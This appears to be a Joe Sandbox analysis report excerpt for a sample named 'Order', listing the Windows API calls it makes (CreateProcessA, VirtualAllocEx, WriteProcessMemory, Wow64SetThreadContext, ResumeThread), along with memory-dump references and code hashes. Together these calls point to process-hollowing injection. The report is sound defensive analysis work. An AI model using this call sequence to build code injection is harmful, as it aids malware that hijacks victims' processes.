                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 00C1D5E0
                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00C1D639
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1736217895.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_c10000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Current$ProcessThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2063062207-0
                                                                                                                                    • Opcode ID: dae20bffc5ff9c16aff86ccbb119fc0651d8600a7de44833d058c9b8bac0da5f
                                                                                                                                    • Instruction ID: 6f6f64aa4f5d62d6d6f196e0efdf0700a4e47e8d83f1480a521d0c7df67d804a
                                                                                                                                    • Opcode Fuzzy Hash: dae20bffc5ff9c16aff86ccbb119fc0651d8600a7de44833d058c9b8bac0da5f
                                                                                                                                    • Instruction Fuzzy Hash: 285144B0D003098FDB14DFAAD648BEEBBF5AF88304F208459E019A7360D774A984CF65

                                                                                                                                    Control-flow Graph (legend: Executed / Not Executed; basic-block edge dump omitted)
                                                                                                                                    APIs
                                                                                                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 07AC4B5E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1762035548.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7ac0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 963392458-0
                                                                                                                                    • Opcode ID: 6638118b64d0c6ca3fd20e49c1f12f4dea70f920e05eba36b363841e16e520e2
                                                                                                                                    • Instruction ID: b1a95a740f0c3f907553d3c84627f99a4a78789c856f145c431bb88df1fa37b2
                                                                                                                                    • Opcode Fuzzy Hash: 6638118b64d0c6ca3fd20e49c1f12f4dea70f920e05eba36b363841e16e520e2
                                                                                                                                    • Instruction Fuzzy Hash: 6FA18FB1D0025ADFDB20CF68C850BDEBBB2FF48314F1481A9E858A7250DB749985CF95

                                                                                                                                    Control-flow Graph (legend: Executed / Not Executed; basic-block edge dump omitted)
                                                                                                                                    APIs
                                                                                                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 07AC4B5E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1762035548.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7ac0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 963392458-0
                                                                                                                                    • Opcode ID: a855677adb800bb6c9af0551e885b12600aff9ce561f108fd516d302741f5ad9
                                                                                                                                    • Instruction ID: eefda34a8481bb106e477694bfcd8d86eb227c9ae06552ff878531ac99410bde
                                                                                                                                    • Opcode Fuzzy Hash: a855677adb800bb6c9af0551e885b12600aff9ce561f108fd516d302741f5ad9
                                                                                                                                    • Instruction Fuzzy Hash: CC9180B1D0025ADFDB20CF68C850BDEBBB2BF48314F1481A9E818A7250DB749985CF95

                                                                                                                                    Control-flow Graph (legend: Executed / Not Executed; basic-block edge dump omitted)
APIs
• GetModuleHandleW.KERNEL32(00000000), ref: 00C1B09E
Memory Dump Source
• Source File: 00000000.00000002.1736217895.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c10000_Order.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0

Control-flow Graph
APIs
• CreateActCtxA.KERNEL32(?), ref: 00C159C9
Memory Dump Source
• Source File: 00000000.00000002.1736217895.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c10000_Order.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0

Control-flow Graph
APIs
• CreateActCtxA.KERNEL32(?), ref: 00C159C9
Memory Dump Source
• Source File: 00000000.00000002.1736217895.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c10000_Order.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
APIs
• WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 07AC4730
Memory Dump Source
• Source File: 00000000.00000002.1762035548.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ac0000_Order.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
APIs
• ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 07AC4810
Memory Dump Source
• Source File: 00000000.00000002.1762035548.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ac0000_Order.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID:
• API String ID: 1726664587-0
APIs
• WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 07AC4730
Memory Dump Source
• Source File: 00000000.00000002.1762035548.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ac0000_Order.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07AC4586
Memory Dump Source
• Source File: 00000000.00000002.1762035548.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ac0000_Order.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00C1D7B7
Memory Dump Source
• Source File: 00000000.00000002.1736217895.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c10000_Order.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
APIs
• ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 07AC4810
Memory Dump Source
• Source File: 00000000.00000002.1762035548.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ac0000_Order.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID:
• API String ID: 1726664587-0
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07AC4586
Memory Dump Source
• Source File: 00000000.00000002.1762035548.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ac0000_Order.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00C1D7B7
Memory Dump Source
• Source File: 00000000.00000002.1736217895.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c10000_Order.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
APIs
• VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 07AC464E
Memory Dump Source
• Source File: 00000000.00000002.1762035548.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ac0000_Order.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
                                                                                                                                    • Opcode ID: b9e052efab25c11b0a5ef0546cae755bc8013ba3340b5ed157e841dfc14367be
                                                                                                                                    • Instruction ID: 820fa2958da520d28028929b59827badb65dbedbdd0ec7ae59e7f08428085204
                                                                                                                                    • Opcode Fuzzy Hash: b9e052efab25c11b0a5ef0546cae755bc8013ba3340b5ed157e841dfc14367be
                                                                                                                                    • Instruction Fuzzy Hash: D621BBB28043889FCF10CFA9C840AEEBFF5EF88310F24841DD4A4A7250C7359540CBA5
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1762035548.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7ac0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ResumeThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 947044025-0
                                                                                                                                    • Opcode ID: d4c2f9e7db27f3bfa880a17684a1be4fee36f2a8ded49853a33b52e106ad3009
                                                                                                                                    • Instruction ID: 09f5265fc08f89eea5ad91651a6c4e91c25f73b5da2dc95ab28287a17b15ea05
                                                                                                                                    • Opcode Fuzzy Hash: d4c2f9e7db27f3bfa880a17684a1be4fee36f2a8ded49853a33b52e106ad3009
                                                                                                                                    • Instruction Fuzzy Hash: A811ACB18043898FDB20DFA9C4457DEFFF4EF88314F20845DC458A7241C6389944CB95
                                                                                                                                    APIs
                                                                                                                                    • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 07AC464E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1762035548.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7ac0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                    • Opcode ID: 80b7f5451f604237ca5eba80548ab4922dfc571adfec144dd1208974cf0cc3eb
                                                                                                                                    • Instruction ID: 158a81d4049b041ed2d1c86c47620da1d872bdc5d873c606f62ccd44af550c19
                                                                                                                                    • Opcode Fuzzy Hash: 80b7f5451f604237ca5eba80548ab4922dfc571adfec144dd1208974cf0cc3eb
                                                                                                                                    • Instruction Fuzzy Hash: 0A1126B19002499FDB10DFAAC844ADEBFF5EB88324F108419E569A7250C775A544CFA5
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1762035548.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7ac0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ResumeThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 947044025-0
                                                                                                                                    • Opcode ID: b1cd2cdf18d4fb439a06f1cd597fb587930fdaa743b7c2018da7304733091196
                                                                                                                                    • Instruction ID: c84a385d575c17f8018f5739803983b9a57479fc36559afe13d1c073bfe80007
                                                                                                                                    • Opcode Fuzzy Hash: b1cd2cdf18d4fb439a06f1cd597fb587930fdaa743b7c2018da7304733091196
                                                                                                                                    • Instruction Fuzzy Hash: 981136B19003498FDB20DFAAC4457DEFFF5EB88324F208429D559A7250CB79A944CFA4
                                                                                                                                    APIs
                                                                                                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 07AC763D
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1762035548.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7ac0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessagePost
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 410705778-0
                                                                                                                                    • Opcode ID: 7d76cf9889a7bfdea427f32fb4513b3cff46c3f8d1abc3e4b7cb7cf9bd62fb2d
                                                                                                                                    • Instruction ID: 7965a01d68e26b5048897653abd81294cbd07771d8260451cb2b0c0e0ba398dd
                                                                                                                                    • Opcode Fuzzy Hash: 7d76cf9889a7bfdea427f32fb4513b3cff46c3f8d1abc3e4b7cb7cf9bd62fb2d
                                                                                                                                    • Instruction Fuzzy Hash: 6E1103B5800349DFDB10DF9AC845BDEFBF8EB48324F10845AE568A7200D375A944CFA5
                                                                                                                                    APIs
                                                                                                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 07AC763D
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1762035548.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7ac0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessagePost
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 410705778-0
                                                                                                                                    • Opcode ID: 83dc04b84b0f5952bc1e0f2233caaad17f5d35a332a7311fcde58080f3544924
                                                                                                                                    • Instruction ID: 5970760db98644df7a15d6deea838c9cf78a02b604aa9f4b9d87912da56e97b9
                                                                                                                                    • Opcode Fuzzy Hash: 83dc04b84b0f5952bc1e0f2233caaad17f5d35a332a7311fcde58080f3544924
                                                                                                                                    • Instruction Fuzzy Hash: BB1122B58003489FDB20DF9AD849BDEFBF8FB48324F20841AE558A3610C375A580CFA5
                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00C1B09E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1736217895.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_c10000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: HandleModule
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4139908857-0
                                                                                                                                    • Opcode ID: 417663a6130c6583aa59c8a4230db91670e1bebb19536c972becb061f0c4f597
                                                                                                                                    • Instruction ID: c36852a3a3beeb0aeecc82caa5691c3304f201d74e4f790a72b3761123c4103d
                                                                                                                                    • Opcode Fuzzy Hash: 417663a6130c6583aa59c8a4230db91670e1bebb19536c972becb061f0c4f597
                                                                                                                                    • Instruction Fuzzy Hash: 9011E3B5C003498FDB10DF9AC444BDEFBF4AB89314F10846AD469A7610D375AA45CFA5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1735991872.0000000000BBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BBD000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_bbd000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 5618673601aa9cf3fb406f056308fe351ac13b80b346e968690e3031d0101644
                                                                                                                                    • Instruction ID: 581fda97e36f07f4380233ff7fc34ab6b863e3771ede564c070671b195d6c1bf
                                                                                                                                    • Opcode Fuzzy Hash: 5618673601aa9cf3fb406f056308fe351ac13b80b346e968690e3031d0101644
                                                                                                                                    • Instruction Fuzzy Hash: D1212871500204DFDB05DF14D9C0B66BFA5FB94314F20C6A9D9094B356D37AE856C6A2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1736033495.0000000000BCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BCD000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_bcd000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 990a1ba393b91218712f7148d4fef7fd2f9ea5782b5a9bddd88db0955236f7c0
                                                                                                                                    • Instruction ID: 02cb5319191c1c038df7259befb28442ade10ab4f91d250430d2502668f0afc4
                                                                                                                                    • Opcode Fuzzy Hash: 990a1ba393b91218712f7148d4fef7fd2f9ea5782b5a9bddd88db0955236f7c0
                                                                                                                                    • Instruction Fuzzy Hash: C721F279604200DFCB14DF18D9D4F26BBA5FB84314F20C5BDD84A4B296C33AD847CA61
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1736033495.0000000000BCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BCD000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_bcd000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: b0baefa7402dbaee4c89539907320a2fdfddeff2f67c511239176aac8f519a7a
                                                                                                                                    • Instruction ID: fc2583180a1f075e6b90a27914f65df16cedfcf8e4a0d146080a6ef3ea8297c8
                                                                                                                                    • Opcode Fuzzy Hash: b0baefa7402dbaee4c89539907320a2fdfddeff2f67c511239176aac8f519a7a
                                                                                                                                    • Instruction Fuzzy Hash: 6021C279604204EFDB05DF14D9C4F26BBA5FB84314F24C6BDE9494F296C336D846CA61
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1736033495.0000000000BCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BCD000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_bcd000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 8e517950672f950348ed78f34663b5b562a896c884bfa74ab9d2204fd5b54191
                                                                                                                                    • Instruction ID: 0a70eb481d9c5fede5a408c845d429afad0ed33c3c546964da2aad299f2548a9
                                                                                                                                    • Opcode Fuzzy Hash: 8e517950672f950348ed78f34663b5b562a896c884bfa74ab9d2204fd5b54191
                                                                                                                                    • Instruction Fuzzy Hash: 6521A4795093808FCB12CF24D594B15BFB1EB45314F28C5EED8498B697C33A980ACB62
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1735991872.0000000000BBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BBD000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_bbd000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                    • Instruction ID: d2c74870ce2813ff94bbfea8f1777ad0db8d64a4f1ed8cf2bfdf797882e0cb07
                                                                                                                                    • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                    • Instruction Fuzzy Hash: C4110372504240CFCB02CF00D5C4B66BFB1FB94324F24C6A9D8090B356C37AE85ACBA2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1736033495.0000000000BCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BCD000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_bcd000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                    • Instruction ID: 97db473e314b700b86696e84024d815658e6e16cdaee8845987cd93f5fe340d2
                                                                                                                                    • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                    • Instruction Fuzzy Hash: E0118B7A604280DFDB16CF14D9C4B15BBA1FB84314F24C6AED8494F696C33AD84ACB61
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1735991872.0000000000BBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BBD000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_bbd000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 6cd3bfaf328a8e44f60902e68f5d2f7c76212fb62a617a9b1fb501906941be86
                                                                                                                                    • Instruction ID: 1b781c3de7da007807f3f2c1482630d15cf55627c126afb8ffcbb47e59e9764d
                                                                                                                                    • Opcode Fuzzy Hash: 6cd3bfaf328a8e44f60902e68f5d2f7c76212fb62a617a9b1fb501906941be86
                                                                                                                                    • Instruction Fuzzy Hash: 1D0184711083409BE7109A27CDC4BF7BFD8DF51324F18C5AAED095A286EABD9C40CA71
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1735991872.0000000000BBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BBD000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_bbd000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: cfd6e5e4f8f0a7e93fde97764fee2cfb7d131a61a6db27c2e24e57def16796e3
                                                                                                                                    • Instruction ID: 6d8639c9b4db1e85b9d1f91c5d5d27abc62e691f487e35982dfa4fd5e31190d7
                                                                                                                                    • Opcode Fuzzy Hash: cfd6e5e4f8f0a7e93fde97764fee2cfb7d131a61a6db27c2e24e57def16796e3
                                                                                                                                    • Instruction Fuzzy Hash: 6DF062714043449BE7108F16CC88BA6FFE8EB91734F18C59AED085B286D6799C44CAB1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1757516014.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_55a0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: TJcq$Te^q$xbaq
                                                                                                                                    • API String ID: 0-3225726259
                                                                                                                                    • Opcode ID: c3878a52f962b2982eacc7605e70f999627979a5dc0c74599203909858e37205
                                                                                                                                    • Instruction ID: dbd14145362ba16e2396a9b72db13f99001fef07e505bcc0c6a28cf7712c406e
                                                                                                                                    • Opcode Fuzzy Hash: c3878a52f962b2982eacc7605e70f999627979a5dc0c74599203909858e37205
                                                                                                                                    • Instruction Fuzzy Hash: 30B19175E006588FDB58DF6AD9446DDBBF2BF88301F14C0AAD809AB364DB345E858F50
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1757516014.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_55a0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 4'^q
                                                                                                                                    • API String ID: 0-1614139903
                                                                                                                                    • Opcode ID: 7512135627ffa8ea5823bdffee6ba42163d81e1d0cb75d18b317fcfe1f51f73f
                                                                                                                                    • Instruction ID: 755001e3b3179a9e51a435ece9922205c2beddd91c64f4b2308cc250e19d06c5
                                                                                                                                    • Opcode Fuzzy Hash: 7512135627ffa8ea5823bdffee6ba42163d81e1d0cb75d18b317fcfe1f51f73f
                                                                                                                                    • Instruction Fuzzy Hash: ED61FE70E00209CFD748EF7BE89069EBBF2FF88301F14C569E1159B269EB7569468B50
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1757516014.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_55a0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 4'^q
                                                                                                                                    • API String ID: 0-1614139903
                                                                                                                                    • Opcode ID: fc74ea3a1b65f461fa74c8bd0220b4bf02000e195511c13d6c2036402cbddf0d
                                                                                                                                    • Instruction ID: c7255f2a0370e3f98a8375175a06a66554c67c38e45b1843352e7451670f39bb
                                                                                                                                    • Opcode Fuzzy Hash: fc74ea3a1b65f461fa74c8bd0220b4bf02000e195511c13d6c2036402cbddf0d
                                                                                                                                    • Instruction Fuzzy Hash: 7661EE70E00209CFD748DF7BE99069EBBF2FF88301F14C569E1159B268EB7569468B50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1762035548.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7ac0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: d32a368ba227bbb84b2baa5652610907d6bb60961230d5530fd6401c1599b095
                                                                                                                                    • Instruction ID: 0bebad4deb87863aeb99c3d0a66573c5b2d4428c73347954420c8ffa0a9b311a
                                                                                                                                    • Opcode Fuzzy Hash: d32a368ba227bbb84b2baa5652610907d6bb60961230d5530fd6401c1599b095
                                                                                                                                    • Instruction Fuzzy Hash: 18E11BB4E001199FCB14DFA9C5809AEFBF2FF89304F249169E414AB356D735A942CFA1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1762035548.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7ac0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: d65212b3cf395d75d28ca588b89d3aebe3be1f65fcf013543ff4f12075b6c6c7
                                                                                                                                    • Instruction ID: a5fcd09495b24e0cb4fb018846228dc4362aab509ef953bce90a51c284128e9d
                                                                                                                                    • Opcode Fuzzy Hash: d65212b3cf395d75d28ca588b89d3aebe3be1f65fcf013543ff4f12075b6c6c7
                                                                                                                                    • Instruction Fuzzy Hash: 77E1F6B4E001199FCB14DFA9C5809AEFBB2FF89304F24D169E414AB356D731A942CFA1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1762035548.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7ac0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 734f41c8aee1f8da71b64330f782ac7e6fa5afa8f6c4a149bc3fa37d38a96122
                                                                                                                                    • Instruction ID: a41e3ad7835cd8afbc3fb4b77c7406e91ea098d615c561dfe7d6c13099d23459
                                                                                                                                    • Opcode Fuzzy Hash: 734f41c8aee1f8da71b64330f782ac7e6fa5afa8f6c4a149bc3fa37d38a96122
                                                                                                                                    • Instruction Fuzzy Hash: A7E10CB4E002199FCB14DF99C580AAEFBF2FF89304F249169E414AB356D735A942CF61
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1762035548.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7ac0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: ccf8531622d5be19ef84818f376cf0643c4597a926682a5a2b042af4293e48a0
                                                                                                                                    • Instruction ID: 6fa3b37728da716aa4be3e85ef2b7bdc9aefc2c8249b312238244a89041fd154
                                                                                                                                    • Opcode Fuzzy Hash: ccf8531622d5be19ef84818f376cf0643c4597a926682a5a2b042af4293e48a0
                                                                                                                                    • Instruction Fuzzy Hash: 89E1F9B4E001199FCB14DFA9C5809AEFBF2FF89304F249169E415AB356D735A942CFA0
                                                                                                                                    Memory Dump Source
